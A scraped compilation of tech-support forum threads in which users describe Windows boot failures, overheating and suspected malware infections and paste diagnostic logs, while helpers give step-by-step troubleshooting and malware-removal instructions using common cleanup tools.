chkdsk and chkdsk /r return with something like "the system has unrecoverable errors"

bootcfg /rebuild returns with something about a problem with the file system and says to run chkdsk lol

I also tried a command to rebuild the boot.ini but it failed to...

I have been successful at getting windows PE to run by booting to cd drive

I tried chkdsk from there and still no good.

Safe mode returns the same results btw so thats out of the question.

ONE TIME I was able to start up windows in something like directory services mode but im not quite sure how :/ It just decided to show up on the menu with boot options on a try.

I've got like 40gigs of backed up data on there that I was *hoping* not to lose so this really pisses me off.

Also when I did get into windows that ONE time I sy... Read more

A:Solved: Serious Problem: Computer Can't even reach login screen.

Read other 16 answers

Computer turned off in the middle of windows update. Now computer can?t get to homepage. Tried all F1-F11 options and received BSOD (Error code: 0x000000F4). Went to windows tech support and all of their tests point that it?s an HP issue. If problem persists, BSOD indicated to disable/remove any newly installed hardware/software and to disable BIOS memory options such as caching or shadowing. Ran all available HP tests (Memory, hard disk, run-in, start-up, and battery). All passed except for battery (failure ID: 9C0c13-00089U-Xd6V5G-C0F603) and run-in (failure ID: 9C0C13-00089T-XD6V5G-C0CN03) tests and both failure id description for these two said, ?Primary battery.? Computer was working just fine before this issue. Please help.

Read other answers

Hello, i am trying to fix a computer for my company but im not sure what the issue is.
1. The computer is on, but has blank screen. I held the power button to turn it off, waiting 1 minute and started it back up. I got the "windows has been shut down improperly" screen. I told it startup like normal and i see the Windows XP icon and the loading bar underneath. But then the screen goes black and the moniter just sits there on, with just black.
I thinking it may be either the RAM card has an error of the motherboard itself is failing, but im not sure how to test these. Any and all help would be greatly appriciated.
Thank you
Windows XP Professional SP3
IBM  ThinkCentre
Pentium 4
Machine Type: 8187
Model : WLL
Product ID: 8187WLL

A:Computer starts up, but doesnt reach login screen.

Will it boot into Safe mode?

Read other 5 answers

Parts List:
AMD CPU FX series
ASUS AMD Motherboard
1 SSD for Booting
2 Hard Disks for storage
GTX 970
750 W Power Supply

My problem is that I hit the power button on my computer it turns on but with fans at 20% and doesn't show anything on the screen, not even bios. I have already replaced the power supply and the motherboard thinking they were killed by a power surge but no luck. I wanted to consult people more knowledgeable than myself before I spend anymore money. Any advice would be great!

I have replaced the motherboard and power supply and tried changing ram and removing ram altogether. I also switched around my hard drives and ssd to try to get to BIOS.

Read other answers

Okay, when I updated to Rkill, I got an interesting log message. Now I typically run Rkill on occassion just out of suspicion cause of my paranoia that my computer is infected. It spoke of missing services and the WSService and SystemEventsBroker having incorrect Image Paths along with a lot of services missing. However I am running Windows 8 (not 8.1) 32 bit in Legacy Boot Mode, and those services are listed in the services section but they aren't running. I use Kaspersky Internet Security 2013 (not updating to 2014 due to all the issues I hear about it and am waiting for a stable version before I upgrade to it), and have run rootkit scans and full scans multiple times along with rkill and TDSSKiller and have found no problems, as well as a Malware Bytes Anti-Malware full scan as well. In addition I have my Full Scan and Critical Areas scans set to Deep Scan in the Kaspersky settings and run a Critical Areas scan every day at 6PM.
Here is the log from Rkill.
Rkill 2.6.4 by Lawrence Abrams (Grinler)
Copyright 2008-2014 BleepingComputer.com
More Information about Rkill can be found at this link:
Program started at: 01/05/2014 06:12:29 PM in x86 mode.
Windows Version: Windows 8 Pro 
Checking for Windows services to stop:
 * No malware services found to stop.
Checking for processes to terminate:
 * No malware processes found t... Read more

A:A Little Suspicious About My Computer.

This issue has already been reported - see here. Grinler, the developer, is investigating.

Read other 5 answers

Thanks to anyone who helps out on this. Just lately my computer has been acting strangely. I try hard to stay on top of security fixes and anti-viral updates. Vipre AV reports nothing so I ran a hijack log. Was hoping I could post it here. Just let me know what I should do next. Thanks a bunch for all you do.

A:suspicious acting computer

Please follow the instructions in ==>This Guide<==. If you cannot complete a step, skip it and continue.Once the proper logs are created, then make a NEW TOPIC and post it ==>HERE<== Please include a description of your computer issues and what you have done to resolve them.If you can produce at least some of the logs, then please create the new topic and explain what happens when you try to create the log(s) that you couldn't get. If you cannot produce any of the logs, then still post the topic and explain that you followed the Prep. Guide, were unable to create the logs, and describe what happens when you try to create the logs.

Read other 2 answers

I was getting a "Create an assoc. in the set assoc.control panel" error when I clicked on links. I fixed this issue by going into default programs and changing it to Internet Explorer.
Before that, when I went in & checked the set associations control panel I noticed lots of saved games (I don't play online games). Also, Google was installed recently without my knowledge so I un-installed it. I also have had Internet explorer browser pages just closing and opening to "about blank" pages. Tech support suggested getting help from the security center - I followed the help page prep procedure they supplied - below are the logs - please advise - THANKS!

DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421
Run by Dwightster at 14:55:12 on 2012-07-03
============== Running Processes ===============
C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files (x86)\Windows Sidebar\sidebar.exe
C:\Program Files (x86)\IE New Window Maximizer\iemaximizer.exe
C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe
C:\Program Files (x86)\Stardock\CursorFX\CursorFX.exe
C:\Program Files (x86)\Siber Systems\AI RoboForm\robotaskbaricon.exe
C:\Program Files\AVAST Software\Avast\AvastUI.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\HP\Button Manager\BM.exe
C:\Program Files (x86)\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe
C:\Program Files... Read more

A:Suspicious computer behavior

Google was installed by my anti-virus offering me a free upgrade which I clicked on. They didn't mention the google add on so I was un-aware I was getting it. Please strike that from my previous post. Thank you.

Read other 11 answers

I recently have encountered some odd things happening with my computer. I have no concrete evidence that my computer is being a plagued by a virus but nevertheless better safe than sorry. It all started today in the morning when I needed to photocopy a document. I turned on my computer and noticed that the whole screen had froze. Nothing was moving not even the cursor. I didn't think much of it because this sorta thing happens time and time. But regardless my scanner/printer was working anyways so I went ahead and photocopied what I needed. To shut off my computer I simply pressed the Restart button and hit the Power button on start up. Later in the afternoon I turned on my computer once again. The Start menu was completely frozen and my cursor would display the hourglass icon if I moused over it. System Tray icons took a very long time to load and Task Manager had froze on my once when I tried to see what processes were going on. The system icons had finally loaded after about 10 minutes which is unusual and I noticed that my avast antivirus system tray icon had a red X next to it. I opened the control system for avast and pressed the 'Fix Now' button and tried to enable the system but there was no response. Aside from that I can freely browse through the internet, but without an antivirus system functioning I am weary that I may be hit by a virus.

DDS (Ver_10-11-27.01) - NTFSx86
Run by Owner at 16:17:39.18 on 03/12/2010
Internet Explorer: 8.0.6001.18702 BrowserJava... Read more

A:Suspicious Activity on Computer


My name is Iain and I will be helping you clean your system.

You may wish to Subscribe to this thread (Thread Tools > Subscribe to this thread) so that you are notified when you receive a reply.

Please read these instructions carefully and then print out or copy this page to Notepad in order to assist you when carrying out the fix. You should not have any open browsers or live internet connections when you are following the procedures below.

Note that the fix may take several posts. Please continue to respond to my instructions until I confirm that your logs are clean. Remember that although your symptoms may vanish, this does NOT mean that your system is clean.

If there is anything you don't understand, please ask BEFORE proceeding with the fixes.

Please ensure that you follow the instructions in the order I have them listed.

Please do not install or uninstall any programmes, or run any other scanners or software, unless I specifically ask you to do so. Also please copy and paste logs into the thread, rather than add them as attachments.

Please download DeFogger to your desktop.

Double click DeFogger to run the tool.
The application window will appear
Click the Disable button to disable your CD Emulation drivers.
Click Yes to continue
A 'Finished!' message will appear
Click OK
DeFogger will now ask to reboot the machine - click OK

IMPORTANT! If you receive an error message while running DeFogger, please post the log defogger_... Read more

Read other 1 answers

So, I know just enough to get me in trouble so I could use some help. I first began noticing issues a couple of weeks ago suddenly when no matter what I did iTunes would not connect to the iTunes Store. I tried all troubleshooting steps from iTunes and on the forums including firewall, ports, winsock reset, and I even installed an earlier version to no avail.
Now today I tried hooking up my WIFI-enabled printer and the computer and printer simply won't communicate. Through trialand error it seems that it has to do with my HomeGroup. It seems several services such as "Peer Networking Grouping" and "Peer Networking Identity Manager" were disabled. I was able to re-start the latter, but the former will not start. I get "Error 101006: The Requested service provider could not be loaded or initialized".  I tried a fix I saw multiple times, deleting "idstore.sst" but no joy. I also tried changing the password or leaving the homegroup and I get error messages. I even tried "System Restore", and found that it's disabled, and it is corrupted. I have also seen that Windows Update is disabled and when I try to enable it, it says the service is not started.
I ran a comprehensive virus scan recently using Avast and nothing of note was turned up. Am I infected?

A:Suspicious Computer Issues - Windows 7

Welcome to BC !
It could be malware or adware. Use the scans below to find and remove both.
Use CCleaner to remove Temporary files, program caches, cookies, logs, etc. Use the Default settings. No need to use the
Registry Cleaning Tool...risky. Pay close attention while installing and UNcheck offers of toolbars....especially Google.
After install, open CCleaner and run by clicking on the Run Cleaner button in the bottom right corner.
CCleaner - PC Optimization and Cleaning - Free Download
Download Malwarebytes' Anti-Malware from Here
Double-click mbam-setup-2.X.X.XXXX.exe to install the application (X's are the current version number).
Make sure a checkmark is placed next to Launch Malwarebytes' Anti-Malware, then click Finish.
Once MBAM opens, when it says Your databases are out of date, click the Fix Now button.
Click the Settings tab at the top, and then in the left column, select Detections and Protections, and if not already checked place a checkmark in the selection box for Scan for rootkits.
Click the Scan tab at the top of the program window, select Threat Scan and click the Scan Now button.
If you receive a message that updates are available, click the Update Now button (the update will be downloaded, installed, and the scan will start).
The scan may take some time to finish,so please be patient.
If potential threats are detected, ensure that Quarantine is selected as the Action for all the listed items, and click the Apply Actions button.
While ... Read more

Read other 1 answers

Apologies for my stupidity...worried about using important/confidential sites until this is resolved. Thank you (very very much) in advance.
 hijackthis.log   12.31KB

A:Suspicious .exe file opened/ran on computer

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===Search and delete the AdWare, PUP (Potentially Unwanted Program) installed on your computer.Please download AdwCleaner by Xplode onto your Desktop.Close all open programs and internet browsers.Double click on AdwCleaner.exe to run the tool.Click on Delete tab follow the prompts.A log file will automatically open after the scan has finished.Please post the content of that log file with your next answer.You can find the log file at C:\AdwCleaner[Rn].txt (n is a number).=== Please downloadJunkware Removal Tool to your Desktop.Please close your security software to avoid potential conflicts.Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.The tool will open and start scanning your system.Please be patient as this can take a while to complete, depending on your system's specifications.On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.Please post the contents of JRT.txt into your reply.===HijackThis doesn't handle Windows 7 well. In your case I need to see a final DDS Log.You should remove HijackThis using the Add/Remove Programs list. Use the DDS tool from now on.Please download and run this DDS Scanning Tool. Nothing will be deleted. It will just gi... Read more

Read other 10 answers

Please look over this log and tell me what you think.

My computer isn't slow, displaying popups or taking actions I don't want, but my latest automatic Windows Update attempt failed and despite a few attempts I can't connect to v6.windowsupdate.microsoft.com to initiate the update again. I also can't connect to grc.com to look at my port status-- my browser just hangs when I try to access the GRC port scanner. Both these are trusted sites in my browser.

I've also had a couple of virus events lately:

I use Zonealarm security suite and 2 days ago (about 8 hours before the Windows update failure) it alerted me that it found and quarantined "Backdoor.Win32.Agent.afqs" during a scan while I was online. It quarantined these files from the following locations:


Also on March 24, A-Squared Free found and quarantined the following:

C:\System Volume Information\_restore{B37680B2-BA0A-4E5D-BF30-83E44C588624}\RP2375\A0340046.dll Quarantined Win32.Virtob.2!IK

I couldn't find anything on the internet about these exact threats so I thought I'd wait a while to see if others reported the same problems. However the windows update issue got me worried, and the "backdoor" part got me bugged. I'm not a computer expert by any means but I'm interested in learning. I tried to run Hijackthis but it hung up after the ... Read more

A:Computer acts differently, and I'm suspicious...

Just as a postscript to my 4/21/09 post, through the Zonealarm forum I found out that Backdoor.Win32.Agent.afqs was a false positive.

That was the good news.

The bad news was Zonealarm found this "infection" in wmiprvse.exe in the C:\WINDOWS\SYSTEM32\WBEM and DLLCACHE folders, so when I deleted the quaratined files (why is it that in hindsight that's a bad idea, but it seemed so good at the time?) I couldn't download windows updates or use my CD drive. That's what got me bugged, although at the time I didn't know all my ills were self-inflicted.

I had to go back to an earlier restore point to get that functionality back. After several hours of fretting, searching among forums for answers, and attempting Windows updating, I think I'm back where I was in the first place.

Hope my learning experience can serve as an example of what not to do for others....

Read other 3 answers

I noticed a few days ago that my computer was running extremely slow. Opening Firefox and browsing the internet was so slow that the mouse would stop moving many times. My computer has 4 GB of RAM and an Intel quad core. It should not be running this slow while only browsing the web. I opened windows task messenger and noticed many processes running under my Windows account name. They looked like OS processes, but there appeared to be a lot more than there normally are. Some of these processes were taking up 600 MB of RAM. I would close the process, but over time another suspicious OS process would take up around the same amount of memory. I have another computer with the same WIndows 7 OS and it doesn't have so many system processes running under the account name.
Any help would be greatly appreciated.

A:Suspicious processes slowing down computer

It doesn't look like I can attach the DDS log to my post. So I copied it and posted it down below
DDS (Ver_2012-11-20.01)
Microsoft Windows 7 Professional
Boot Device: \Device\HarddiskVolume1
Install Date: 12/14/2012 4:00:39 PM
System Uptime: 12/15/2014 2:40:53 PM (1 hours ago)
Motherboard: Intel Corporation |  | DG965OT
Processor: Intel® Core™2 Quad CPU    Q6600  @ 2.40GHz | LGA 775 | 2394/266mhz
==== Disk Partitions =========================
C: is FIXED (NTFS) - 439 GiB total, 58.966 GiB free.
D: is FIXED (NTFS) - 492 GiB total, 445.288 GiB free.
E: is CDROM ()
H: is Removable
==== Disabled Device Manager Items =============
Class GUID:
Description: PCI Simple Communications Controller
Device ID: PCI\VEN_8086&DEV_29A4&SUBSYS_505A107B&REV_02\3&18D45AA6&0&18
Name: PCI Simple Communications Controller
PNP Device ID: PCI\VEN_8086&DEV_29A4&SUBSYS_505A107B&REV_02\3&18D45AA6&0&18
Class GUID: {4d36e972-e325-11ce-bfc1-08002be10318}
Description: Intel® 82562V 10/100 Network Connection
Device ID: PCI\VEN_8086&DEV_104C&SUBSYS_0001107B&REV_02\3&18D45AA6&0&C8
Manufacturer: Intel
Name: Intel® 82562V 10/100 Network Connection
PNP Device ID: PCI\VEN_8086&DEV_104C&SUBSYS_0001107B&REV_02\3&18D45AA6&0&am... Read more

Read other 10 answers

I downloaded some risky files and now I'm noticing odd behavior from my computer. The boot up time now needs to be counted in minutes. Before it was seconds. Some programs take an extremely long time to start. There are new entries in task manager that I don't recognize. I tried rolling back the computer to a time before I had downloaded the files, but that did not have an effect on the load times. Pretty convinced that I lost the gamble this time and am now harboring undesirables.
DDS report:
DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 10.0.9200.16660  BrowserJavaVersion: 10.25.2
Run by momo at 15:15:07 on 2013-10-04
Microsoft Windows 7 Ultimate   6.1.7601.1.1252.1.1033.18.3071.1412 [GMT -7:00]
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
============== Running Processes ================
C:\Program Files\Realtek\Audio\HDA\RtkAudioService.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe
C:\Program Files\Realtek\Audio\HDA\RtHDVBg.exe
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\Program Files\Jump Desktop\JumpService.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamscheduler.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamservice.exe
C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe
C:\Windows\system32\taskhos... Read more

A:Not sure if infected, but suspicious behavior from computer.

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===Please download AdwCleaner by Xplode onto your Desktop.Close all open programs and internet browsers.Double click on AdwCleaner.exe to run the tool.Click the Scan button and wait for the process to complete.Click the Report button and the report will open in Notepad.IMPORTANTIf you click the Clean button all items listed in the report will be removed.If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.Close all open programs and internet browsers.Double click on AdwCleaner.exe to run the tool.Click the Scan button and wait for the process to complete.Check off the element(s) you wish to keep.Click on the Clean button follow the prompts.A log file will automatically open after the scan has finished.Please post the content of that log file with your next answer.You can find the log file at C:\AdwCleaner[Sn].txt (n is a number). Please downloadJunkware Removal Tool to your Desktop.Please close your security software to avoid potential conflicts.Run the tool by double-clicking it. If you are using Windows Vista or 7, right-mouse click it and select Run as administrator.The tool will open and start scanning your system.Please be patient as this can take a while to complete, depending on your system's specifica... Read more

Read other 9 answers

Been trying to fix a m8's computer and been having problems. I have not had a chance to go down and have a bash at it one on one, but thought id get some advice off you guys before i take it on

First off spec is:

Mobo - Sapphire RD480SB450 (pretty sure its a Pure Advantage)
CPU - AMD 64 3200+
GCard - X800 Sapphire (Unlocked to X850)
Ram - 512mb stick(PC3200), 256mb stick(pc2700)
OS - Xp Pro
HDD - WD 80g

Lately the computer has been turning off in random places, but 9/10 times the shutdowns occur when playing games, mainly WOW (When i say shutdown, i mean it completely turns off instantly, and he needs to turn it on again). Has happened on other games as well, but he plays WOW most. Its occuring more and more and he has never had this kind of problem until now.

But i asked him to look at his processor temperature (Using speedfan). It could be quite extatic, going up to high temperatures like 65c. But i told him to wait till it crashed and then check the BIOS on boot to see the temperature, which he did and it was at 72c which i know is a dodgey temperature (Was informed that the cut off for AMD64's is 80C, and that the maximum operating tempt is around 70C before problems arise). I am assumeing the processor is hitting its highest temp and just switching itself off. And perhaps the recent heat increase outside (with it being summer) has triggered this sudden burst of system shutdowns.

I did however have a similar problem myself with the same... Read more

A:Computer randonly shutting down, suspicious CPU temp

I wouldn`t reflash the BIOS again. Its very risky. I would reinstall properly the heatsink, and apply some arctic silver 5. (sorry if I didn`t read it, very long post ).

Those temps are extremely high for an athlon 64. Something is really wrong with the cooling system.
Does the case have some exhaust and intake fans on it? Is the CPU fan spinning correctly?

Read other 7 answers

When the home computer was last started up it exhibited some very odd behaviour. The desktop background image had been changed to a plain blue screen with a warning message regarding spyware in the centre of it, and the 'Desktop' and 'Screen Saver' tabs were missing from the 'Display' option in the Control Panel. I knew how to fix this using regedit, and restored the desktop to its former image as well as reinstating the tabs, but upon rebooting the machine next time, the same happened again.

Upon investigation I found a number of very suspicious programs appearing in the Start menu (some of them were even pinned), on the desktop (seemingly out of nowhere) and in the 'Add/Remove Programs' list, from which they could not be uninstalled but did mention their locations in the the 'Program Files' folder, where they could be found within folders with long and nonsensical names: consisting of seemingly random letters and numbers. I removed all of these wherever I could.

However, I am not convinced that the machine is in the clear yet, and so thought it best to follow the 5 steps and then post a HiJack This log:

Deckard's System Scanner v20071014.68
Run by Owner on 2008-07-11 15:58:37
Computer is in Normal Mode.

System Drive C: has 4.7 GiB (less than 15%) free.

-- HijackThis (run as Owner.exe) -----------------------------------------------

Logfile of Trend Micro HijackThis v2.0... Read more

A:Strange computer behavious and suspicious programs

72 hours

Read other 19 answers

Hey guys, My work computer is at the last stages of its career. I am on a quest to revive it before I toss it out. It has been really good to me for about 4 years or so now. I hate Vista but hey what r u gonna do.. (
Here is the deal. Computer has been really slow lately, also the desktop is always refreshes itself after a certain amount of time passes by. I rearrange all the shortcuts and folders to my liking and only to come back to a refreshed and arranged setting.
Also my Norton AV logfile shows a bunch of trojans and such. I am in need of help of you gurus' knowledge.
Any help would be much appreciated!!!
I attached the "attach.txt" as well as the "resolved security risks" file Norton created
Here is my DDS log
Thanks guys...
DDS (Ver_2012-11-20.01) - NTFS_x86 
Internet Explorer: 8.0.6001.19443
Run by EDE at 13:19:13 on 2013-10-21
============== Running Processes ================
C:\Program Files\DAEMON Tools Lite\DTLite.exe
C:\Windows\system3... Read more

A:Computer has been acting up. Suspicious of Malware/Trojan

Hello, Welcome to BleepingComputer.I'm nasdaq and will be helping you.If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.===--RogueKiller--Download & SAVE to your Desktop RogueKiller for 32bit or Roguekiller for 64bit Quit all programs that you may have started.Please disconnect any USB or external drives from the computer before you run this scan!For Vista or Windows 7, right-click and select "Run as Administrator to start"For Windows XP, double-click to start.Wait until Prescan has finished ...Then Click on "Scan" buttonWait until the Status box shows "Scan Finished"click on "delete"Wait until the Status box shows "Deleting Finished"Click on "Report" and copy/paste the content of the Notepad into your next reply.The log should be found in RKreport[1].txt on your DesktopExit/Close RogueKiller+===Please download AdwCleaner by Xplode onto your Desktop.Close all open programs and internet browsers.Double click on AdwCleaner.exe to run the tool.Click the Scan button and wait for the process to complete.Click the Report button and the report will open in Notepad.IMPORTANTIf you click the Clean button all items listed in the report will be removed.If you find some false positive items or programs that you wish to keep, Close the AdwCleaner windows.Close all open programs and internet browsers.Double click on AdwCleaner.exe to run the tool.Click the Scan button and wait for t... Read more

Read other 2 answers

This computer has started showing symptoms similar to what happened to our other computer. (see thread here: http://www.bleepingcomputer.com/forums/t/553407/multiple-dllhostexe-com-surrogate-instances/)  I am seeing CPU usage of between 20% to 70% when the computer is not being used.  I also see multiple dllhost.exe *32 and dllhst3g.exe *32 processes running.  This computer runs Windows 7, and has the free version of AVG.
Please advise as to next steps.
Thank you -

A:Suspicious CPU and memory usage when computer is "idle"

You may be infected with Poweliks which typically affects the ability to browse or download files using Internet Explorer and causes PowerShell error alerts. Task Manager typically shows numerous occurrences of (COM Surrogate) dllhost.exe or dllhst3g.exe. If using a 64-bit version of Windows, then these entries will be listed as dllhost.exe *32 or dllhst3g.exe *32. These processes are known to spawn and consume a large amount of system resources as described here.If you are having trouble downloading files with Internet Explorer, follow these instructions to re-enable downloads/reset all Security zones to default.Please download ESETPoweliksCleaner and save it to your Desktop Double-click on ESETPoweliksCleaner.exe to start the tool.Read the terms of the End-user license agreement and click Agree if you agree to them.The tool will run automatically. If the cleaner finds a Poweliks infection, press the Y key on your keyboard to remove it...If Poweliks was detected "Win32/Poweliks was successfully removed from your system" will be displayed.Press any key to exit the tool and reboot your computer...The tool will produce a log in the same directory the tool was run from.Copy and paste the contents of that log in your next reply.Note: If the log is too long...you may need to split it and use multiple replies in order to post all the information.

Read other 7 answers

Ok, so until a couple of days back, all seemed pretty ok & then I felt the PC slowing down a bit, I didn't pay attention that time but in the morning it took ages to boot the PC, so I defragmented the drives, ran error-checks on disks, did a boot-scan with Avast, ran Malwarebytes & such, then there was an episode where all the text in all the windows was gone, be it Opera, Windows Explorer & so on, CPU running at full speed & everything, I tried to access Malwarebytes & got a message that system resources were insufficient (something like that), even Avast froze, I rebooted & ran Rkill, the only process it showed was Avast so I uninstalled it (re-installed now) & ran Malwarebytes (again), Spybot S&D, I already had Spywareblaster & Spyware Guard installed, then I downloaded, installed & scanned with Superantispyware, Panda AV, Sophos rootkit tool, Emsisoft Emergency Kit, a couple of them caught some stuff but they mostly seemed like false-positives because I could recognize most of them as gamebots but I deleted them anyway.

Anyways, so PC still seems to work, it's not slow while working but the boot still takes 5-10 minutes, previously it was probably a minute or two; may be there are viruses or rootkits sitting in there

Another thing I've noticed is that a CD icon has been appearing beside the pointer/cursor sometimes when waiting for something to happen, just like you know that hourglass appears beside the pointer/cu... Read more

A:Computer booting slowly & suspicious behavior

Read other 16 answers

I was signing in to my Google account when suddenly my computer downloaded a file called "comments_ajax". It had a slightly modified icon, and looked a bit like the Windows icon. When I went to view it under "Downloads" in my Windows Explorer, it says that it is a 1 KB file. I don't dare to open it. Is it malicious? Please help. Also when it downloaded, my Chrome screen stopped the sign in process and just stayed on the blank screen. Just a few hours ago, my Youtube comments started loading very slowly as well. 

A:Help Please! Computer auto-downloaded a suspicious file.

I went into my download history on Chrome and found the file listed with this link: http://www.youtube.com/comments_ajax?v=1X4iXjpbX3o

Is this malicious? The image is also similar to one of a Windows logo over a driver or something. Please help. I have since located the 1 KB file from Windows Explorer and deleted it. It was labelled under file type as "File" (I did not open it)

Read other 67 answers

Yesterday my computer started asking whether I wanted to allow Windows Activation Technologies to make changes to my computer. I keep clicking "No," but it pops up again every thirty seconds to two minutes later. My computer has also become less responsive, briefly freezing every so often and not always registering when I click on something. I know WAT is a legitimate program from Microsoft, but I was on an untrustworthy site when it first started happening and I suspect something malicious got onto my computer and is trying to use the program to negatively affect my system. I'm using Windows 7 Home Premium with a 64-bit operating system on a Lenovo laptop. The program that keeps requesting permission is located at C:\Windows\system32\Wat\WatAdminSvc.exe . There's probably a lot more information you need--I've seen posts with huge logs of data--so please let me know what info you need and how to get it for you.

Read other answers

first of all thanks for helping me with my problem.. ,
Lately my computer is freezing for a few seconds while playing games
but they DO NOT freeze for no reason, they only freeze when i hold a key down ( ex. "W" to move forward, game just freezes for 10-15 sec. until i release the key ) someone suggested me to go to --> power options and use high performance power plan, but it doesn't help too much, it just takes a little bit longer for the lags to start, I've recently scanned my computer with AVAST and Malwarebytes' and i have found a few things

AVAST found something named A6000038.exe ( no clue what that is )
and Malwarebytes' found 5 infected files named " Bandoo.exe "
here is the log file :

DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by WarezTD at 19:24:49.03 on Sun 03/27/2011
Internet Explorer: 8.0.7601.17514
Microsoft Windows 7 Ultimate 6.1.7601.1.1252.1.1033.18.2046.612 [GMT 2:00]
AV: avast! Antivirus *Disabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
SP: avast! Antivirus *Disabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: IObit Security 360 *Disabled/Outdated* {FAE2835A-B90A-9E7A-85DA-82DBDA7C1E3A}
============== Running Processes ===============
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\ati... Read more

A:Computer lags at gameplay - suspicious activity

REALLY, Why are you removing my posts i just want to get an answer because this problem is just getting worse.. >.>

Read other 1 answers

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:48:27 AM, on 5/13/2012
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v8.00 (8.00.7601.17514)
Boot mode: Normal

Running processes:
C:\Program Files (x86)\Motorola\MotoConnectService\MotoConnect.exe
C:\Program Files (x86)\Hp\Digital Imaging\bin\hpqtra08.exe
C:\Program Files (x86)\McAfee Security Scan\2.0.181\SSScheduler.exe
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
C:\Program Files (x86)\MSN Toolbar\Platform\4.0.0369.0\mswinext.exe
C:\Program Files (x86)\OpenOffice.org 3\program\soffice.exe
C:\Program Files (x86)\STOPzilla!\STOPzilla.exe
C:\Program Files (x86)\OpenOffice.org 3\program\soffice.bin
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
C:\Program Files (x86)\STOPzilla!\SZOptionsFlash.exe
C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avcenter.exe
C:\Program Files (x86)\Trend Micro\HiJackThis\HiJackThis.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
... Read more

A:HijackThis Log, some slow & suspicious computer activity

Where are the other required logs and information?


Between using P2P file sharing apps and using cleaner/booster/optimizer/tuneup/tweak utilities, it's not surprising at all that your computer is having issues.


Read other 2 answers

Hello, i've encountered performance drops with cpu usage <2% for few months now(games worked perfectly when installed first time; computer classification shows cpu rank 2.9 now, when i checked it for the first time it was 7.3), since the first problems i've reinstalled it 2 times, first one was about 1-2 months ago, second one was today. Both of them didn't fixed it. From tools i've used for scanning only catchme found something suspicious. I'm using windows 7(only os with performance problems), Fedora and Arch linux.Thank You for Your help!DDS (Ver_2011-08-26.01) - NTFSAMD64 Internet Explorer: 9.0.8112.16421 BrowserJavaVersion: 10.5.1Run by Jasiek at 21:14:45 on 2012-06-16Microsoft Windows 7 Home Premium 6.1.7600.0.1250.48.1045.18.8173.6108 [GMT 2:00].SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}.============== Running Processes ===============.C:\Windows\system32\wininit.exeC:\Windows\system32\lsm.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\nvvsvc.exeC:\Windows\system32\svchost.exe -k RPCSSC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestrictedC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestrictedC:\Windows\system32\svchost.exe -k netsvcsC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\svchost.exe -k Networ... Read more

A:Computer slowdown & suspicious catchme output

Hello again, i found out what was the source of performance problems, it was caused by Inter turbo boost technology.It dynamically overclocks processor to save energy, it won't overclock it if it's temperature is >95*C - the part of laptop that failed was cooling system filled with dust after few months of using.
Anyways i still have a question about this suspicious catchme log, is it some sort of malware or just catchme is not supporting win7 x64?

Read other 5 answers